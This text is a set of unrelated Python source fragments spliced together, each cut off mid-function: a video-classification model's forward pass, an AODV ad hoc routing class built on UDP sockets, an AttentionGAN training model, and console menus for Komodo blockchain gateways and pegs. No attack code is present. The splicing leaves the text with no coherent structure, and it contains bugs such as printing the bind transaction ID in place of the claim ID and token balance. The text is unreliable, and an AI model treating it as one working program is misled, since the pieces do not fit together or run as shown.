return feat_out_list, base_out_list, ind_list
def late_fusion(self, base_out_list, in_matrix, out_matrix):
return base_out_list
def forward(self, *argv, **kwargs):
if not self.args.ada_reso_skip: # TODO simple TSN
_, base_out = self.backbone(kwargs["input"][0], self.base_model, self.new_fc,
signal=self.args.default_signal)
output = self.consensus(base_out)
return output.squeeze(1)
input_list = kwargs["input"]
batch_size = input_list[0].shape[0] # TODO(yue) input[0] B*(TC)*H*W
if self.args.use_reinforce:
lite_j_list, r_all, r_log_prob = self.get_lite_j_and_r(input_list, self.using_online_policy(),
kwargs["tau"])
else:
lite_j_list, r_all = self.get_lite_j_and_r(input_list, self.using_online_policy(), kwargs["tau"])
if self.multi_models:
if "tau" not in kwargs:
kwargs["tau"] = None
feat_out_list, base_out_list, ind_list = self.get_feat_and_pred(input_list, r_all, tau=kwargs["tau"])
else:
feat_out_list, base_out_list, ind_list = [], [], []
if self.args.policy_also_backbone:
base_out_list.append(torch.stack(lite_j_list, dim=1))
if self.args.offline_lstm_last: # TODO(yue) no policy - use policy net as backbone - just LSTM(last)
return lite_j_list[-1].squeeze(1), None, None, None
elif self.args.offline_lstm_all: # TODO(yue) no policy -
import threading, logging, socket, os, select, re
from threading import Timer
# Defines
AODV_HELLO_INTERVAL = 10
AODV_HELLO_TIMEOUT = 30
AODV_PATH_DISCOVERY_TIME = 30
AODV_ACTIVE_ROUTE_TIMEOUT = 300
# Class Definition
class aodv(threading.Thread):
# Constructor
def __init__(self):
threading.Thread.__init__(self)
self.node_id = ""
self.num_nodes = 0
self.seq_no = 0
self.rreq_id = 0
self.listener_port = 0
self.aodv_port = 0
self.tester_port = 0
self.listener_sock = 0
self.aodv_sock = 0
self.tester_sock = 0
self.log_file = ""
self.command = ""
self.status = ""
self.neighbors = dict()
self.routing_table = dict()
self.message_box = dict()
self.rreq_id_list = dict()
self.pending_msg_q = []
self.status = "Active"
self.hello_timer = 0
# Set the Node ID
def set_node_id(self, nid):
self.node_id = nid
# Set the number of nodes in the network
def set_node_count(self, count):
self.num_nodes = count
# Get the port associated with the listener thread for the given node
def get_listener_thread_port(self, node):
return 33100
# port = {'n1': 1000,
# 'n2': 1100,
# 'n3': 1200,
# 'n4': 1300,
# 'n5': 1400,
# 'n6': 1500,
# 'n7': 1600,
# 'n8': 1700,
# 'n9': 1800,
# 'n10': 1900}['n'+str(node)]
# return port
# Get the port used to communicate with the listener thread for this node
def get_listener_port(self, node):
return 33200
# port = {'n1': 2000,
# 'n2': 2100,
# 'n3': 2200,
# 'n4': 2300,
# 'n5': 2400,
# 'n6': 2500,
# 'n7': 2600,
# 'n8': 2700,
# 'n9': 2800,
# 'n10': 2900}['n'+str(node)]
# return port
# Get the port associated with sending and receiving AODV messages
def get_aodv_port(self, node):
# return 33300
port = {'n1': 33310,
'n2': 33320,
'n3': 33330,
'n4': 33340,
'n5': 33350}['n'+str(node)]
return port
# Get the port associated with sending and receiving AODV messages
def get_aodv_ip(self, node):
ip = {'n1': '10.35.70.38',
'n2': '10.35.70.6',
'n3': '10.35.70.26'}['n'+str(node)]
return ip
# Get the tester port associated with this node
def get_tester_port(self, node):
return 33500
# port = {'n1': 5100,
# 'n2': 5200,
# 'n3': 5300,
# 'n4': 5400,
# 'n5': 5500,
# 'n6': 5600,
# 'n7': 5700,
# 'n8': 5800,
# 'n9': 5900,
# 'n10': 6000}['n'+str(node)]
# return port
# Create / Restart the lifetime timer for the given route
def aodv_restart_route_timer(self, route, create):
if (create == False):
timer = route['Lifetime']
timer.cancel()
timer = Timer(AODV_ACTIVE_ROUTE_TIMEOUT,
self.aodv_process_route_timeout, [route])
route['Lifetime'] = timer
route['Status'] = 'Active'
timer.start()
# Send a message
def aodv_send(self, destination, destination_port, message):
try:
message_bytes = bytes(message, 'utf-8')
destination_ip = self.get_aodv_ip(destination)
self.aodv_sock.sendto(message_bytes, 0,
(destination_ip, destination_port))
except:
pass
# Send the hello message to all the neighbors
def aodv_send_hello_message(self):
try:
# Send message to each neighbor
for n in self.neighbors.keys():
message_type = "HELLO_MESSAGE"
sender = self.node_id
message_data = "Hello message from " + str(self.node_id)
message = message_type + ":" + sender + ":" + message_data
port = self.get_aodv_port(n)
self.aodv_send(n, int(port), message)
logging.debug("['" + message_type + "', '" + sender + "', " +
"Sending hello message to " + str(n) + "']")
# Restart the timer
self.hello_timer.cancel()
self.hello_timer = Timer(AODV_HELLO_INTERVAL, self.aodv_send_hello_message, ())
self.hello_timer.start()
except:
pass
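# Note on the wire format: messages in this module are plain colon-delimited
# strings ("TYPE:sender:..."). The receive path is not part of this excerpt, but
# a dispatcher would be expected to split on ':' before calling the
# aodv_process_* handlers, e.g. (illustrative only):
#     fields = data.decode('utf-8').split(':')
#     if fields[0] == 'HELLO_MESSAGE':
#         self.aodv_process_hello_message(fields)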
# Process incoming hello messages
def aodv_process_hello_message(self, message):
logging.debug(message)
sender = message[1]
# Get the sender's ID and restart its neighbor liveness timer
try:
if (sender in self.neighbors.keys()):
neighbor = self.neighbors[sender]
timer = neighbor['Timer-Callback']
timer.cancel()
timer = Timer(AODV_HELLO_TIMEOUT,
self.aodv_process_neighbor_timeout, [sender])
self.neighbors[sender] = {'Neighbor': sender,
'Timer-Callback': timer}
timer.start()
# Restart the lifetime timer
route = self.routing_table[sender]
self.aodv_restart_route_timer(route, False)
else:
#
# We come here when we get a hello message from a node that
# is not there in our neighbor list. This happens when a
# node times out and comes back up again. Add the node to
# our neighbor table.
#
timer = Timer(AODV_HELLO_TIMEOUT,
self.aodv_process_neighbor_timeout, [sender])
self.neighbors[sender] = {'Neighbor': sender,
'Timer-Callback': timer}
timer.start()
# Update the routing table as well
if (sender in self.routing_table.keys()):
route = self.routing_table[sender]
self.aodv_restart_route_timer(route, False)
else:
self.routing_table[sender] = {'Destination': sender,
'Destination-Port': self.get_aodv_port(sender),
'Next-Hop': sender,
'Next-Hop-Port': self.get_aodv_port(sender),
'Seq-No': '1',
'Hop-Count': '1',
'Status': 'Active'}
self.aodv_restart_route_timer(self.routing_table[sender], True)
except KeyError:
# This neighbor has not been added yet. Ignore the message.
pass
# Process incoming application message
def aodv_process_user_message(self, message):
# Get the message contents, sender and receiver
sender = message[1]
receiver = message[2]
msg = message[3]
# Check if the message is for us
if (receiver == self.node_id):
# Add the message to the message box
self.message_box[msg] = {'Sender': sender, 'Message': msg}
# Log the message and notify the user
logging.debug(message)
print("New message arrived. Issue 'view_messages' to see the contents")
else:
#
# Forward the message by looking up the next-hop. We should have a
# route for the destination.
#
# TODO update lifetime for the route
route = self.routing_table[receiver]
next_hop = route['Next-Hop']
next_hop_port = int(route['Next-Hop-Port'])
self.aodv_restart_route_timer(route, False)
message = message[0] + ":" + message[1] + ":" + message[2] + ":" + message[3]
self.aodv_send(next_hop, next_hop_port, message)
logging.debug("['USER_MESSAGE', '" + sender + " to " + receiver + "', " + msg + "']")
# Process an incoming RREQ message
def aodv_process_rreq_message(self, message):
# Extract the relevant parameters from the message
message_type = message[0]
sender = message[1]
hop_count = int(message[2]) + 1
message[2] = str(hop_count)
rreq_id = int(message[3])
dest = message[4]
dest_seq_no = int(message[5])
orig = message[6]
orig_seq_no = int(message[7])
orig_port = self.get_aodv_port(orig)
sender_port = self.get_aodv_port(sender)
# Ignore the message if we are not active
if (self.status == "Inactive"):
return
logging.debug("['" + message[0] + "', 'Received RREQ to " + message[4] + " from " + sender + "']")
# Discard this RREQ if we have already received this before
if (orig in self.rreq_id_list.keys()):
node_list = self.rreq_id_list[orig]
per_node_rreq_id_list = node_list['RREQ_ID_List']
if rreq_id in per_node_rreq_id_list.keys():
logging.debug("['RREQ_MESSAGE', 'Ignoring duplicate RREQ (" + orig + ", " + str(rreq_id) + ") from " + sender + "']")
return
# This is a new RREQ message. Buffer it first
if (orig in self.rreq_id_list.keys()):
per_node_list = self.rreq_id_list[orig]
else:
per_node_list = dict()
path_discovery_timer = Timer(AODV_PATH_DISCOVERY_TIME,
self.aodv_process_path_discovery_timeout,
[orig, rreq_id])
per_node_list[rreq_id] = {'RREQ_ID': rreq_id,
'Timer-Callback': path_discovery_timer}
self.rreq_id_list[orig] = {'Node': self.node_id,
'RREQ_ID_List': per_node_list}
path_discovery_timer.start()
#
# Check if we have a route to the source. If we have, see if we need
# to update it. Specifically, update it only if:
#
# 1. The destination sequence number for the route is less than the
# originator sequence number in the packet
# 2. The sequence numbers are equal, but the hop_count in the packet
# + 1 is lesser than the one in routing table
# 3. The sequence number in the routing table is unknown
#
# If we don't have a route for the originator, add an entry
if orig in self.routing_table.keys():
# TODO update lifetime timer for this route
route = self.routing_table[orig]
if (int(route['Seq-No']) < orig_seq_no):
route['Seq-No'] = orig_seq_no
self.aodv_restart_route_timer(route, False)
elif (int(route['Seq-No']) == orig_seq_no):
if (int(route['Hop-Count']) > hop_count):
route['Hop-Count'] = hop_count
route['Next-Hop'] = sender
route['Next-Hop-Port'] = sender_port
self.aodv_restart_route_timer(route, False)
elif (int(route['Seq-No']) == -1):
route['Seq-No'] = orig_seq_no
self.aodv_restart_route_timer(route, False)
else:
# TODO update lifetime timer for this route
self.routing_table[orig] = {'Destination': str(orig),
'Destination-Port': str(orig_port),
'Next-Hop': str(sender),
'Next-Hop-Port': str(sender_port),
'Seq-No': str(orig_seq_no),
'Hop-Count': str(hop_count),
'Status': 'Active'}
self.aodv_restart_route_timer(self.routing_table[orig], True)
#
# Check if we are the destination. If we are, generate and send an
# RREP back.
#
if (self.node_id == dest):
self.aodv_send_rrep(orig, sender, dest, dest, 0, 0)
return
#
# We are not the destination. Check if we have a valid route
# to the destination. If we have, generate and send back an
# RREP.
#
if (dest in self.routing_table.keys()):
# Verify that the route is valid and has a higher seq number
route = self.routing_table[dest]
status = route['Status']
route_dest_seq_no = int(route['Seq-No'])
if (status == "Active" and route_dest_seq_no >= dest_seq_no):
self.aodv_send_rrep(orig, sender, self.node_id, dest, route_dest_seq_no, int(route['Hop-Count']))
return
else:
# Rebroadcast the RREQ
self.aodv_forward_rreq(message)
# Process an incoming RREP message
# models/attention_gan_model.py
import torch
import itertools
from util.image_pool import ImagePool
from .base_model import BaseModel
from . import networks
from util.util import prob_2_entropy,to_3dim,to_4dim
import numpy as np
import torch.nn.functional as F
class AttentionGANModel(BaseModel):
@staticmethod
def modify_commandline_options(parser, is_train=True):
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')
return parser
def __init__(self, opt):
BaseModel.__init__(self, opt)
# specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>
visual_names_A = ['real_A', 'fake_B', 'rec_A', 'o1_b', 'o2_b', 'a1_b', 'a2_b', 'i1_b']
visual_names_B = ['real_B', 'fake_A', 'rec_B', 'o1_a', 'o2_a', 'a1_a', 'a2_a', 'i1_a']
if self.isTrain and self.opt.lambda_identity > 0.0: # if identity loss is used, we also visualize idt_B=G_A(B) ad idt_A=G_A(B)
visual_names_A.append('idt_B')
visual_names_B.append('idt_A')
if self.opt.saveDisk:
self.visual_names = ['real_A', 'fake_B', 'rec_A', 'a1_b', 'a2_b']
else:
self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B
# specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# define networks (both Generators and discriminators)
# The naming is different from those used in the paper.
# Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, 'our', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, 'our', opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain: # define discriminators
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_content_A = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_content_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain,
self.gpu_ids)
if self.isTrain:
if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels
assert(opt.input_nc == opt.output_nc)
self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_C_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_C_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.real_C_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.real_C_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
# define loss functions
self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device) # define GAN loss.
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
# initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
# def entropy_loss(v):
# """
# Entropy loss for probabilistic prediction vectors
# input: batch_size x channels x h x w
# output: batch_size x 1 x h x w
# """
# assert v.dim() == 4
# n, c, h, w = v.size()
# return -torch.sum(torch.mul(v, torch.log2(v + 1e-30))) / (n * h * w * np.log2(c))
# def prob_2_entropy(prob):
# """ convert probabilistic prediction maps to weighted self-information maps
# """
# n, c, h, w = prob.size()
# #entropy = -torch.mul(prob, torch.log2(prob + 1e-30)) / np.log2(c)
# entropy = -torch.mul(prob, torch.log2(prob + 1e-30)) / (n * h * w)
# return entropy
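# NOTE: the commented-out helpers above duplicate the prob_2_entropy utility that
# is already imported from util.util at the top of this file; they appear to be
# kept only as a reference implementation.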
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap domain A and domain B.
"""
AtoB = self.opt.direction == 'AtoB'
self.real_A = input['A' if AtoB else 'B'].to(self.device)
self.real_B = input['B' if AtoB else 'A'].to(self.device)
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.fake_B, self.o1_b, self.o2_b, \
self.a1_b, self.a2_b, \
self.i1_b,\
self.fake_c_b= self.netG_A(self.real_A) # G_A(A)
self.rec_A, _, _, \
_, _, \
_,_= self.netG_B(self.fake_B) # G_B(G_A(A))
self.fake_A, self.o1_a, self.o2_a, \
self.a1_a, self.a2_a,\
self.i1_a,\
self.fake_c_a = self.netG_B(self.real_B) # G_B(B)
self.rec_B, _, _, \
_, _,\
_,_ = self.netG_A(self.fake_A) # G_A(G_B(B))
self.idt_A, _, _, \
self.idt_A_att1, self.idt_A_att2, \
self.idt_A_cont, _ = self.netG_A(self.real_B)
self.idt_B, _, _, \
self.idt_B_att1, self.idt_B_att2, \
self.idt_B_cont, _ = self.netG_B(self.real_A)
def backward_D_basic(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, True)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_basicA(self, netD, real_a, real_b, fake_a, fake_b):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real A
pred_real_a = netD(real_a)
loss_D_real_a = self.criterionGAN(pred_real_a, 0)
# Real B
pred_real_b = netD(real_b)
loss_D_real_b = self.criterionGAN(pred_real_b, 1)
# Fake A
pred_fake_a = netD(fake_a.detach())
loss_D_fake_a = self.criterionGAN(pred_fake_a, 2)
# Fake B
pred_fake_b = netD(fake_b.detach())
loss_D_fake_b = self.criterionGAN(pred_fake_b, 3)
# Combined loss and calculate gradients
loss_D = (loss_D_real_a + loss_D_real_b + loss_D_fake_a + loss_D_fake_b)
loss_D.backward()
return loss_D
def backward_D_basicB(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, 0)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, 2)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_A(self):
"""Calculate GAN loss for discriminator D_A"""
fake_B = self.fake_B_pool.query(self.fake_B)
fake_A = self.fake_A_pool.query(self.fake_A)
self.loss_D_A = self.backward_D_basicA(self.netD_A, self.real_A, self.real_B, fake_A, fake_B)
def backward_D_content_A(self):
fake_C_B = self.fake_C_B_pool.query(self.fake_c_b)
real_C_B = self.real_C_B_pool.query(self.o2_b)
self.loss_D_content_A = self.backward_D_basic(self.netD_content_A, real_C_B, fake_C_B)
def backward_D_content_B(self):
fake_C_A = self.fake_C_A_pool.query(self.fake_c_a)
real_C_A = self.real_C_A_pool.query(self.o2_a)
self.loss_D_content_B = self.backward_D_basic(self.netD_content_B, real_C_A, fake_C_A)
def backward_G(self):
"""Calculate the loss for generators G_A and G_B"""
lambda_idt = self.opt.lambda_identity #0.5
lambda_A = self.opt.lambda_A #10
lambda_B = self.opt.lambda_B #10
ones = torch.ones(self.real_A.size()).cuda()
# Identity loss
if lambda_idt > 0:
# G_A should be identity if real_B is fed: ||G_A(B) - B||
self.idt_A, _, _, \
self.idt_A_att1, self.idt_A_att2, \
self.idt_A_cont,_ = self.netG_A(self.real_B)
self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt
# G_B should be identity if real_A is fed: ||G_B(A) - A||
self.idt_B, _, _, \
self.idt_B_att1, self.idt_B_att2, \
self.idt_B_cont,_ = self.netG_B(self.real_A)
self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt
else:
self.loss_idt_A = 0
self.loss_idt_B = 0
# GAN loss D_A(G_A(A))
self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), 1)*4
# GAN loss D_B(G_B(B))
self.loss_G_B = self.criterionGAN(self.netD_A(self.fake_A), 0)*4
# Forward cycle loss || G_B(G_A(A)) - A||
self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A
# Backward cycle loss || G_A(G_B(B)) - B||
self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B
# combined loss and calculate gradients
self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + \
self.loss_idt_A + self.loss_idt_B
self.loss_G.backward()
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# forward
self.forward() # compute fake images and reconstruction images.
# G_A and G_B
self.set_requires_grad([self.netD_A], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero
self.backward_G() # calculate gradients for G_A and G_B
self.optimizer_G.step() # update G_A and G_B's weights
["+str(info['totalsupply'])+"]", 'green'))
print(colorize("Gateways Remaining Supply ["+str(info['remaining'])+"]", 'green'))
print(colorize("Gateways Issued Supply ["+str(info['issued'])+"]", 'green'))
input("Press [Enter] to continue...")
return gw_index
except Exception as e:
print(info)
print(e)
print("Something went wrong. Please check your input")
input("Press [Enter] to continue...")
def gateways_deposit_claim_tokens(rpc_connection_assetchain, rpc_connection_komodo):
selected_gateway = gateway_info_tui(rpc_connection_assetchain)
gateways_list = rpc_connection_assetchain.gatewayslist()
bind_txid = gateways_list[selected_gateway]
gw_info = rpc_connection_assetchain.gatewaysinfo(bind_txid)
gw_sendmany = gateways_send_kmd(rpc_connection_komodo, gw_info['deposit'])
gw_sendmany_txid = gw_sendmany[0]
gw_recipient_addr = gw_sendmany[1]
gw_deposit_amount = gw_sendmany[2]
deposit_info = gateways_deposit_tui(rpc_connection_assetchain, rpc_connection_komodo,
bind_txid, gw_info['coin'], gw_sendmany_txid, gw_deposit_amount,
gw_recipient_addr)
deposit_txid = deposit_info[0]
dest_pub = deposit_info[1]
claim_txid = gateways_claim_tui(rpc_connection_assetchain, bind_txid, gw_info['coin'],
deposit_txid, dest_pub, gw_deposit_amount)
tokenbalance = rpc_connection_assetchain.tokenbalance(gw_info['tokenid'])
print("Gateway transfer complete!")
print(colorize("Deposit TXID ["+str(bind_txid)+"]", 'green'))
print(colorize("Claim TXID ["+str(bind_txid)+"]", 'green'))
print(colorize("Token Balance ["+str(bind_txid)+"]", 'green'))
def pegs_fund_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
token_txid = select_tokenid(rpc_connection)
tokenbalance = rpc_connection.tokenbalance(token_txid)['balance']/100000000
amount = int(input("Set pegs funding amount ("+str(tokenbalance)+" available): "))
except KeyboardInterrupt:
break
else:
fund_hex = rpclib.pegs_fund(rpc_connection, pegs_txid, token_txid, amount)
print(fund_hex)
if fund_hex['result'] == "error":
print(colorize("\nSomething went wrong!\n", "magenta"))
print(fund_hex)
print("\n")
input("Press [Enter] to continue...")
break
else:
try:
pegsfund_txid = rpclib.sendrawtransaction(rpc_connection,
fund_hex['hex'])
except KeyError:
print(fund_hex)
print("Error")
input("Press [Enter] to continue...")
break
else:
print(colorize("Pegs Fund transaction broadcasted: " + pegsfund_txid, "green"))
input("Press [Enter] to continue...")
break
def pegs_get_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
token_txid = select_tokenid(rpc_connection)
info = rpc_connection.pegsaccountinfo(pegs_txid)
if info['result'] == "success":
if len(info['account info']) > 0:
for item in info['account info']:
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
amount = input("Set pegs get amount: ")
except KeyboardInterrupt:
break
else:
pegsget_hex = rpclib.pegs_get(rpc_connection, pegs_txid, token_txid, amount)
if pegsget_hex['result'] == "error":
print(colorize("\nSomething went wrong!\n", "magenta"))
print(pegsget_hex)
print("\n")
input("Press [Enter] to continue...")
break
else:
try:
pegsget_txid = rpclib.sendrawtransaction(rpc_connection,
pegsget_hex['hex'])
except KeyError:
print(pegsget_hex)
print("Error")
input("Press [Enter] to continue...")
break
else:
print(colorize("Pegs Get transaction broadcasted: " +pegsget_txid, "green"))
input("Press [Enter] to continue...")
break
# pegs_txid = 5ccdff0d29f2f47fb1e349c1ff9ae17977a58763abacf693cd27e98b38fad3f3
def pegsinfo_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
info = rpc_connection.pegsinfo(pegs_txid)
if info['result'] == "success":
if len(info['info']) > 0:
for item in info['info']:
print("Token: "+item['token'])
print("Total deposit: "+str(item['total deposit']))
print("Total debt: "+str(item['total debt']))
print("Ratio : "+str(item['total ratio']))
print("Global ratio: "+info['global ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
except KeyError:
print(info)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_accounthistory_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
history = rpc_connection.pegsaccounthistory(pegs_txid)
if history['result'] == "success":
if len(history['account history']) > 0:
for item in history['account history']:
print("-----------------------")
print("Action: "+item['action'])
print("Amount: "+str(item['amount']))
print("Account TXID: "+item['accounttxid'])
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("-----------------------")
#[{'action': 'fund', 'amount': 100000000, 'accounttxid': '1e9409af6e391f996de434a3f86d765df43251d61cc1e720fa9a6457078d0f61', 'token': 'KMD', 'deposit': 100000000, 'debt': 0}, {'action': 'get', 'amount': 50000000, 'accounttxid': '<KEY>', 'token': '<PASSWORD>', 'deposit': 100000000, 'debt': 50000000}]}
except KeyError:
print(history)
print("Key Error: "+str(KeyError))
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_accountinfo_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
info = rpc_connection.pegsaccountinfo(pegs_txid)
if info['result'] == "success":
if len(info['account info']) > 0:
for item in info['account info']:
print("Token: "+item['token'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("Something went wrong.")
print(info)
input("Press [Enter] to continue...")
break
except KeyError:
print(info)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_addresses_tui(rpc_connection):
while True:
try:
address = rpc_connection.pegsaddress()
if address['result'] == "success":
print("PegsCCAddress: "+address['PegsCCAddress'])
print("PegsCCBalance: "+str(address['PegsCCBalance']))
print("PegsNormalAddress: "+address['PegsNormalAddress'])
print("PegsNormalBalance: "+address['PegsNormalBalance'])
print("PegsCCTokensAddress: "+address['PegsCCTokensAddress'])
print("myCCAddress(Pegs): "+address['myCCAddress(Pegs)'])
print("myCCbalance(Pegs): "+str(address['myCCbalance(Pegs)']))
print("myaddress: "+address['myaddress'])
print("mybalance: "+str(address['mybalance']))
else:
print("Something went wrong.")
print(address)
input("Press [Enter] to continue...")
break
except KeyError:
print(address)
print("Error")
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_worstaccounts_tui(rpc_connection):
while True:
try:
pegs_txid = input("Enter Pegs TXID: ")
worst = rpc_connection.pegsworstaccounts(pegs_txid)
if worst['result'] == "success":
if 'KMD' in worst:
if len(worst['KMD']) > 0:
for item in worst['KMD']:
print("Account TXID: "+item['accounttxid'])
print("Deposit: "+str(item['deposit']))
print("Debt: "+str(item['debt']))
print("Ratio "+item['ratio'])
else:
print("No accounts at risk of liquidation at the moment.")
info = rpc_connection.pegsinfo(pegs_txid)
if info['result'] == "success":
if len(info['info']) > 0:
for item in info['info']:
print("Token: "+item['token'])
print("Total deposit: "+str(item['total deposit']))
print("Total debt: "+str(item['total debt']))
print("Ratio : "+str(item['total ratio']))
print("Global ratio: "+info['global ratio'])
except KeyError:
print(worst)
print("Key Error: "+str(KeyError))
input("Press [Enter] to continue...")
break
finally:
input("Press [Enter] to continue...")
break
def pegs_create_tui():
paramlist = ["-ac_supply=5000", "-ac_reward=800000000",
"-ac_sapling=1", "-addnode=localhost", "-ac_snapshot=1440",
"-ac_cc=2", "-ac_import=PEGSCC", "-debug=gatewayscc-2",
"-ac_end=1", "-ac_perc=0", "-ac_cbopret=7"
]
while True:
kmd_path = input("Input komodod path (e.g. /home/user/komodo/src): ")
if not os.path.isfile(kmd_path+'/komodod'):
print("komodod not found in "+kmd_path+"! Try again.")
else:
break
# check if komodod exists in path
coin = input("Enter name of Pegs chain to create: ")
#check for bad chars
external_coin = input("Enter ticker of external coin to Peg (e.g. KMD): ")
#check for bad chars
token_supply = input("How many tokens to create?: ")
paramlist.append("-ac_name="+coin)
# launch chains, get rpcs
rpcs = spawn_chain_pair(coin, kmd_path, paramlist)
primary_rpc = rpcs[0]
secondary_rpc = rpcs[1]
secondary_rpc.setgenerate(True, 1)
# get address, wif and pubkeys
primary_addr = primary_rpc.getnewaddress()
primary_wif = primary_rpc.dumpprivkey(primary_addr)
primary_pubkey = primary_rpc.validateaddress(primary_addr)['pubkey']
primary_rpc.setpubkey(primary_pubkey)
# selfsend to avoid coinbase errors
balance = primary_rpc.getbalance()
selfsend_txid = primary_rpc.sendtoaddress(primary_addr, int(balance)/2)
check_if_tx_in_mempool(primary_rpc, selfsend_txid)
token_txid = token_create_tui(primary_rpc, external_coin, token_supply, external_coin+"_tether")
oracle_txid = oracle_create_tui(primary_rpc, external_coin, external_coin+"_tether", 'IhhL')
oracle_register_tui(primary_rpc, oracle_txid, '0.001')
oracle_subscription_utxogen(primary_rpc, oracle_txid, primary_pubkey, '50', 10)
tokensupply = str(primary_rpc.tokeninfo(token_txid)['supply'])
bind_txid = gateways_bind_tui(primary_rpc, token_txid, tokensupply, oracle_txid, external_coin)
